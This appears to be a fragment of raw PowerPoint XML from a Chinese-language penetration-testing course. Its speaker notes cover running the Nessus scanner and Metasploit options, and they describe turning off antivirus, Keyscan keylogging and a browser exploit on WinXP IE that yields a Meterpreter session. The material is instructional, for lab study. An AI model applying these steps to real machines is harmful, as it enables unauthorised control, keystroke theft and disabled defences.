                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31351958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800" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3119801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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>打开快照，哪位同学还记着？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nessusd.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，然后再如何输入网址？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安装时间比较长，需要耐心等待</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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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16335272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从输出的结果中可以看到显示了四列信息，分别是选项名称、当前设置、需求及描述。其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的选项是必须配置的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904046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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42088371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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17315067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b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>一般情况下，用户都会在计算机中安装杀毒软件。为了方便实施其它操作，用户可以关闭掉杀毒软件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39606303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u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>有的可能用不了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Keyscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>可能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>可以用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14834501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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://zhuanlan.zhihu.com/p/505816130</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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1669139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effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/m0_48907714/article/details/123427352</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>端口启动服务，然后它会生成一个链接，这个链接我们把它拷贝出来，然后到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>winXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的系统上，然后我们打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的浏览器，把这个测试的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址我们粘贴过来，会发一个跳转转向的这样的命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。双击快捷方式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>回到命令行这之后我们可以看到它这里面有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，通过它我们可以进一步的去控制系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13789313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https://www.bilibili.com/video/BV1sN4y1c7F6?p=4</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err="1"/>
              <a:t>AllowPowershellPrompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>设置允许调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>，恶意代码尝试允许这一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>中自带的漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>调用的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27063185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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36814635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background</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21173775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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>如果我们要扫描的是一个网站，我们选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Web Application Tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>；如果是要扫描一个主机的话，我们选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Advanced Scan(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>可以扫描端口，主机，服务，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
